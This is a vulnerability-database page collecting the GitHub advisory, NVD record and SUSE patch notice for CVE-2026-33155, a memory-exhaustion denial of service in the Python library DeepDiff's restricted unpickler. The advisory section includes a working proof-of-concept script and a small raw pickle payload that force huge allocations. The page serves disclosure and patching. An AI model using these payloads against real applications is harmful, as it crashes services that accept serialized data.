              "fixed": "8.6.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33155"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T20:10:08Z",
    "nvd_published_at": "2026-03-20T21:17:15Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe pickle unpickler `_RestrictedUnpickler` validates which classes can be loaded but does not limit their constructor arguments. A few of the types in `SAFE_TO_IMPORT` have constructors that allocate memory proportional to their input (`builtins.bytes`, `builtins.list`, `builtins.range`). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call `pickle_load` with untrusted data.\n\n### Details\n\nCVE-2025-58367 hardened the delta class against pollution and remote code execution by converting `SAFE_TO_IMPORT` to a `frozenset` and blocking traversal. `_RestrictedUnpickler.find_class` only gates which classes can be loaded. It doesn\u0027t intercept `REDUCE` opcodes or validate what is passed to constructors.\n\nIt can be exploited in 2 ways.\n\n**1 - During `pickle_load`**\n\nA pickle that calls `bytes(N)` using opcodes permitted by the allowlist. The allocation happens during deserialization and before the delta processes anything. The restricted unpickler does not override `load_reduce` so any allowed class can be called.\n\n```\nGLOBAL builtins.bytes      (passes find_class check \u2014 serialization.py:353)\nINT    10000000000          (10 billion)\nTUPLE + REDUCE             \u2192 bytes(10**10) \u2192 allocates ~9.3 GB\n```\n\n**2 - During delta application**\n\nA valid diff dict that first sets a value to a large int via `values_changed`, then converts it to bytes via `type_changes`. It works because `_do_values_changed()` runs before `_do_type_changes()` in `Delta.add()` in `delta.py` line 183. Step 1 modifies the target in place before step 2 reads the modified value and calls `new_type(current_old_value)` at `delta.py` line 576 with no size guard.\n\n### PoC\n\nThe script uses Python\u0027s `resource` module to cap memory to 1 GB so you can reproduce safely without hitting the OOM killer. It loads deepdiff first, applies the limit, then runs the payload. Change `10**8` to `10**10` for the full 9.3 GB allocation.\n\n```python\nimport resource\nimport sys\n\ndef limit_memory(maxsize_mb):\n    \"\"\"Cap virtual memory for this process.\"\"\"\n    soft, hard = resource.getrlimit(resource.RLIMIT_AS)\n    maxsize_bytes = maxsize_mb * 1024 * 1024\n    try:\n        resource.setrlimit(resource.RLIMIT_AS, (maxsize_bytes, hard))\n        print(f\"[*] Memory limit set to {maxsize_mb} MB\")\n    except ValueError:\n        print(\"[!] Failed to set memory limit.\")\n        sys.exit(1)\n\n# Load heavy imports before enforcing the limit\nfrom deepdiff import Delta\nfrom deepdiff.serialization import pickle_dump, pickle_load\n\nlimit_memory(1024)\n\n# --- Delta application path ---\npayload_dict = {\n    \u0027values_changed\u0027: {\"root[\u0027x\u0027]\": {\u0027new_value\u0027: 10**8}},\n    \u0027type_changes\u0027: {\"root[\u0027x\u0027]\": {\u0027new_type\u0027: bytes}},\n}\n\npayload1 = pickle_dump(payload_dict)\nprint(f\"Payload size: {len(payload1)} bytes\")\n\ntarget = {\u0027x\u0027: \u0027anything\u0027}\ntry:\n    result = target + Delta(payload1)\n    print(f\"Allocated: {len(result[\u0027x\u0027]) // 1024 // 1024} MB\")\n    print(f\"Amplification: {len(result[\u0027x\u0027]) // len(payload1)}x\")\nexcept MemoryError:\n    print(\"[!] MemoryError \u2014 payload tried to allocate too much\")\n\n# --- Raw pickle path ---\npayload2 = (\n    b\"(dp0\\n\"\n    b\"S\u0027_\u0027\\n\"\n    b\"cbuiltins\\nbytes\\n\"\n    b\"(I100000000\\n\"\n    b\"tR\"\n    b\"s.\"\n)\n\nprint(f\"Payload size: {len(payload2)} bytes\")\ntry:\n    result2 = pickle_load(payload2)\n    print(f\"Allocated: {len(result2[\u0027_\u0027]) // 1024 // 1024} MB\")\nexcept MemoryError:\n    print(\"[!] MemoryError \u2014 payload tried to allocate too much\")\n```\n\nOutput:\n```\n[*] Memory limit set to 1024 MB\nPayload size: 123 bytes\nAllocated: 95 MB\nAmplification: 813008x\nPayload size: 42 bytes\nAllocated: 95 MB\n```\n\n### Impact\n\nDenial of service. Any application that deserializes delta objects or calls `pickle_load` with untrusted inputs can be crashed with a small payload. The restricted unpickler is meant to make this safe. It prevents remote code execution but doesn\u0027t prevent resource exhaustion.\n\nThe amplification is large. 800,000x for delta and 2,000,000x for raw pickle.\n\nImpacted users are anyone who accepts serialized delta objects from untrusted sources \u2014 network APIs, file uploads, message queues, etc.",
  "id": "GHSA-54jj-px8x-5w5q",
  "modified": "2026-04-14T21:59:44Z",
  "published": "2026-03-18T20:10:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/qlustered/deepdiff/security/advisories/GHSA-54jj-px8x-5w5q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33155"
    },
    {
      "type": "WEB",
      "url": "https://github.com/qlustered/deepdiff/commit/0d07ec21d12b46ef4e489383b363eadc22d990fb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/seperman/deepdiff"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "DeepDiff has Memory Exhaustion DoS through SAFE_TO_IMPORT"
}

FKIE_CVE-2026-33155

Vulnerability from fkie_nvd - Published: 2026-03-20 21:17 - Updated: 2026-04-14 18:24

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/qlustered/deepdiff/commit/0d07ec21d12b46ef4e489383b363eadc22d990fb	Patch
	security-advisories@github.com	https://github.com/qlustered/deepdiff/security/advisories/GHSA-54jj-px8x-5w5q	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	qluster	deepdiff	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:qluster:deepdiff:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F297C465-900E-44A9-9697-7E3E001D9314",
              "versionEndExcluding": "8.6.2",
              "versionStartIncluding": "5.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "DeepDiff is a project focused on Deep Difference and search of any Python data. From version 5.0.0 to before version 8.6.2, the pickle unpickler _RestrictedUnpickler validates which classes can be loaded but does not limit their constructor arguments. A few of the types in SAFE_TO_IMPORT have constructors that allocate memory proportional to their input (builtins.bytes, builtins.list, builtins.range). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call pickle_load with untrusted data. This issue has been patched in version 8.6.2."
    },
    {
      "lang": "es",
      "value": "DeepDiff es un proyecto centrado en la Diferencia Profunda y la b\u00fasqueda de cualquier dato de Python. Desde la versi\u00f3n 5.0.0 hasta antes de la versi\u00f3n 8.6.2, el des-serializador de pickle _RestrictedUnpickler valida qu\u00e9 clases pueden cargarse, pero no limita los argumentos de sus constructores. Algunos de los tipos en SAFE_TO_IMPORT tienen constructores que asignan memoria proporcional a su entrada (builtins.bytes, builtins.list, builtins.range). Una carga \u00fatil de pickle de 40 bytes puede forzar m\u00e1s de 10 GB de memoria, lo que provoca el bloqueo de aplicaciones que cargan objetos delta o llaman a pickle_load con datos no confiables. Este problema ha sido parcheado en la versi\u00f3n 8.6.2."
    }
  ],
  "id": "CVE-2026-33155",
  "lastModified": "2026-04-14T18:24:04.770",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-20T21:17:15.910",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/qlustered/deepdiff/commit/0d07ec21d12b46ef4e489383b363eadc22d990fb"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/qlustered/deepdiff/security/advisories/GHSA-54jj-px8x-5w5q"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-400"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-770"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

SUSE-SU-2026:1094-1

Vulnerability from csaf_suse - Published: 2026-03-26 17:56 - Updated: 2026-03-26 17:56

Summary

Security update for python-deepdiff

Severity

Important

Notes

Title of the patch: Security update for python-deepdiff

Description of the patch: This update for python-deepdiff fixes the following issues: - CVE-2026-33155: Fixed denial of service via builtins.bytes, builtins.list, builtins.range (bsc#1260064).

Patchnames: SUSE-2026-1094,openSUSE-SLE-15.6-2026-1094

CVE-2026-33155

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Vendor Fix To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

References

URL

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33155 (GCVE-0-2026-33155)

OPENSUSE-SU-2026:10417-1

GHSA-54JJ-PX8X-5W5Q

Summary

Details

PoC

Impact

FKIE_CVE-2026-33155

SUSE-SU-2026:1094-1

Tags

Sightings

Nomenclature